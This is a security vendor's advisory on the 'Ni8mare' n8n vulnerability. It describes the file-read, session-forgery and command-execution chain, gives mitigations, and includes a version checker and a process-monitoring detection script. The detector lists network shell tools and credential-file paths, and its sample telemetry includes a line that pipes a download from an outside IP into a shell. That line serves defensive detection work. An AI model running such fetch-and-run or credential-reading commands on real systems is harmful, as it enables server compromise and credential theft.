Critical Remote Code Execution (RCE) in AI Automation Tool n8n — "Ni8mare"

A critical unauthenticated RCE vulnerability (CVE-2026-21858, CVSS 10.0) in the popular AI workflow tool n8n allows attackers to read sensitive server files and escalate to full remote code execution. Here is what you need to know.

BridgeLynk Threat Intelligence
Mar 13, 2026

Overview

n8n is a widely adopted open-source AI workflow automation platform used by organisations to connect applications, automate processes, and build AI-powered pipelines. A critical vulnerability — dubbed 'Ni8mare' by its discoverer, security researcher Dor Attias of Cyera — has been identified in versions 1.65.0 through 1.120.x. Tracked as CVE-2026-21858 with a maximum CVSS score of 10.0, the flaw enables an unauthenticated remote attacker to read arbitrary files on the underlying server, extract sensitive credentials, and escalate into full remote code execution. A patch is available in version 1.121.0 and organisations should upgrade immediately.

Vulnerability Summary

CVE: CVE-2026-21858
CVSS Score: 10.0 (Critical)
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
MITRE ATT&CK: TA0002 – Execution / T1674 – Input Injection
Affected Versions: >= 1.65.0 and < 1.121.0
Fixed Version: 1.121.0

The vulnerability is rooted in insufficient sanitisation and improper handling of file uploads in n8n's webhook processing logic, specifically in requests whose Content-Type header is set to multipart/form-data. Because no authentication is required to interact with publicly exposed n8n workflow endpoints, any remote attacker who can reach the service can exploit this flaw.
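As an added check (example code written for this page, not part of the original advisory and not n8n's own tooling), the script below compares installed n8n versions against the affected range stated above. The inventory, its hostnames and version strings are constructed; the handling of the "1.120.x" shorthand and of prerelease tags is an assumption about how versions may be recorded in an asset list, not a statement about n8n's release naming.

```javascript
// Added example for this page: is a given n8n version inside the affected
// range quoted in the advisory (>= 1.65.0 and < 1.121.0)?
// Generic semver handling; not n8n's own code.
function parseVersion(v) {
  // Accepts "1.120.4", "v1.120.4", "1.120.4-rc.1" and the "1.120.x" shorthand
  // (assumption: "x" is treated as the lowest patch level of that minor).
  const m = /^v?(\d+)\.(\d+)\.(\d+|x)(?:-([0-9A-Za-z.-]+))?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return {
    major: Number(m[1]),
    minor: Number(m[2]),
    patch: m[3] === 'x' ? 0 : Number(m[3]),
    prerelease: m[4] || null,
  };
}

function compareVersions(a, b) {
  for (const k of ['major', 'minor', 'patch']) {
    if (a[k] !== b[k]) return a[k] < b[k] ? -1 : 1;
  }
  // Semver rule: a prerelease sorts before its release, so a hypothetical
  // 1.121.0-rc.1 is still below 1.121.0 and therefore still unpatched.
  if (a.prerelease && !b.prerelease) return -1;
  if (!a.prerelease && b.prerelease) return 1;
  return 0;
}

const AFFECTED_FROM = parseVersion('1.65.0');  // first affected (inclusive)
const FIXED_IN = parseVersion('1.121.0');      // first fixed (exclusive upper bound)

function isAffected(installed) {
  const v = parseVersion(installed);
  return compareVersions(v, AFFECTED_FROM) >= 0 && compareVersions(v, FIXED_IN) < 0;
}

// Constructed inventory of instances (hostnames and versions are made up).
const inventory = [
  { host: 'automation-01', version: '1.64.3' },
  { host: 'automation-02', version: '1.65.0' },
  { host: 'automation-03', version: '1.120.4' },
  { host: 'automation-04', version: '1.121.0-rc.1' },
  { host: 'automation-05', version: '1.121.0' },
];

// Returns the hostnames that still need the upgrade.
function triage(list) {
  return list.filter((i) => isAffected(i.version)).map((i) => i.host);
}

console.log('Hosts still on an affected n8n version:', triage(inventory));
```

Feed it whatever `n8n --version` or your container image tags report; the prerelease rule matters because a release candidate of the fixed version is not the fix.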

How the Attack Works

Exploitation of Ni8mare follows a clear and dangerous escalation path.

Stage 1: arbitrary file read. The attacker manipulates the req.body.files variable within a vulnerable form-based workflow. By pointing this variable at any file readable by the server process, such as /etc/passwd, and interacting with n8n's built-in chat interface, the attacker can retrieve the file's contents directly, without any credentials.

Stage 2: credential theft and session forgery. The same technique is used to extract the n8n SQLite database, which stores usernames, email addresses, hashed passwords, and the secret key n8n uses to generate cookie session tokens. Armed with this secret key, the attacker can forge a valid session token for any user account on the platform, achieving full privilege escalation without cracking a single password.

Stage 3: remote code execution. Once authenticated to the n8n server, the attacker creates a workflow containing an Execute Command node, a legitimate n8n feature, to run arbitrary operating system commands on the underlying server. This completes the chain from unauthenticated file read to full remote code execution.

Mitigation Strategies

There is no known workaround for this vulnerability. The only effective remediation is to upgrade to n8n version 1.121.0 or later, which contains the official patch. Beyond patching, BridgeLynk recommends the following defensive measures for organisations running n8n or similar webhook-enabled workflow engines:

1. Do not expose your n8n instance directly to the internet. Where internet access is operationally necessary, place the service behind an authenticated reverse proxy, web application firewall (WAF), or VPN.

2. Implement authentication controls on sensitive workflow endpoints. Workflows that handle file uploads or interact with AI knowledge bases should require credential verification before execution; the Webhook and Form Trigger nodes offer built-in authentication options for this purpose.

3. Conduct a security audit of your n8n deployment and all connected workflow engines. Review which workflows are publicly accessible and assess the data they can reach.

4. Monitor for anomalous process execution on hosts running n8n, particularly shells and other child processes spawned by the n8n service that read system or credential files or open network connections. The Execute Command node used in the final stage of the chain runs operating system commands through a shell, so sh or bash children of the n8n node process are a strong signal.

5. If exposure is suspected, patching alone is not enough. A successful exploit yields the secret key used to sign session cookies and the stored credential database, so rotate that secret and the credentials held by the instance, invalidate existing sessions, and review workflows for Execute Command nodes you did not create.
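The following detection logic, added here as an example and not taken from the advisory or from any vendor product, walks process-start events and flags shell, network-tool or credential-file activity whose ancestry leads back to the n8n service process, which is the host-level signal measure 4 above asks for. The event schema and the sample lines are constructed; the rule that node-to-node child processes (n8n's own task runners) are expected while shells are not is our assumption and should be tuned to your deployment, as should the file paths, which follow the data directory of the official container image.

```javascript
// Added example for this page: flag suspicious descendants of the n8n service
// in process-start telemetry. Event fields and sample lines are constructed;
// map them to whatever your EDR or auditd pipeline emits.
const SHELLS = new Set(['sh', 'bash', 'dash', 'zsh', 'ash']);
const NET_TOOLS = /\b(curl|wget|nc|ncat|socat|\/dev\/tcp)\b/;
const SENSITIVE = /(\/etc\/(passwd|shadow)|\.n8n\/(config|database\.sqlite)|\.env\b)/;

// The n8n service itself: a node binary whose command line names n8n.
function isN8nProcess(e) {
  return /\bnode\b/.test(e.exe) && /\bn8n\b/.test(e.cmdline);
}

// Walk the ppid chain (bounded) to decide whether n8n is an ancestor, so that
// `sh -c "curl ... | sh"` and the curl it spawns are both attributed to n8n.
function descendsFromN8n(e, byPid, maxDepth = 4) {
  let cur = e;
  for (let depth = 0; depth < maxDepth; depth++) {
    const parent = byPid.get(cur.ppid);
    if (!parent) return false;
    if (isN8nProcess(parent)) return true;
    cur = parent;
  }
  return false;
}

// Takes JSON lines, returns one alert per suspicious process with its reasons.
function analyzeEvents(lines) {
  const events = lines.map((l) => JSON.parse(l));
  const byPid = new Map(events.map((e) => [e.pid, e]));
  const alerts = [];
  for (const e of events) {
    // Assumption: n8n's own node children (task runners) are expected; skip them.
    if (isN8nProcess(e) || !descendsFromN8n(e, byPid)) continue;
    const base = e.exe.split('/').pop();
    const reasons = [];
    if (SHELLS.has(base)) reasons.push('shell spawned under n8n');
    if (SENSITIVE.test(e.cmdline)) reasons.push('touches credential or system file');
    if (NET_TOOLS.test(e.cmdline)) reasons.push('network tool under n8n');
    if (reasons.length) {
      alerts.push({ ts: e.ts, pid: e.pid, exe: base, cmdline: e.cmdline,
        severity: reasons.length > 1 ? 'critical' : 'high', reasons });
    }
  }
  return alerts;
}

// Constructed sample telemetry (pids, paths and timestamps are made up).
const sampleEvents = [
  { ts: '2026-03-13T10:00:00Z', pid: 100, ppid: 1, user: 'node', exe: '/usr/local/bin/node',
    cmdline: 'node /usr/local/bin/n8n start' },
  { ts: '2026-03-13T10:00:05Z', pid: 120, ppid: 100, user: 'node', exe: '/usr/local/bin/node',
    cmdline: 'node /usr/local/lib/node_modules/n8n/node_modules/@n8n/task-runner/dist/start.js' },
  { ts: '2026-03-13T10:14:02Z', pid: 130, ppid: 100, user: 'node', exe: '/bin/sh',
    cmdline: 'sh -c cat /home/node/.n8n/config' },
  { ts: '2026-03-13T10:14:02Z', pid: 131, ppid: 130, user: 'node', exe: '/bin/cat',
    cmdline: 'cat /home/node/.n8n/config' },
  { ts: '2026-03-13T10:14:09Z', pid: 140, ppid: 100, user: 'node', exe: '/bin/sh',
    cmdline: 'sh -c curl http://203.0.113.5/s | sh' },
  { ts: '2026-03-13T10:15:00Z', pid: 200, ppid: 50, user: 'ops', exe: '/bin/bash',
    cmdline: 'bash -l' },
].map((e) => JSON.stringify(e));

for (const a of analyzeEvents(sampleEvents)) {
  console.log(`[${a.severity}] pid ${a.pid} ${a.exe}: ${a.reasons.join('; ')}`);
}
```

The task-runner node child (pid 120) produces no alert and the operator's interactive bash under a different parent is ignored, while the shell that reads the config file, the cat it spawns, and the shell that pipes a download into sh are all raised. Tune the allow-list to the processes your workflows legitimately launch; an n8n host that never runs the Execute Command node should treat any shell child as critical.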

How BridgeLynk Can Help

AI automation tools are rapidly becoming central to how organisations operate — and as adoption grows, so does the attack surface. BridgeLynk works with organisations to assess the security posture of AI and automation tooling, identify exposed attack surfaces before adversaries do, and implement controls that reduce risk without slowing down operations. Speak to our team to learn how we can support your organisation's security maturity and resilience against emerging threats like Ni8mare.
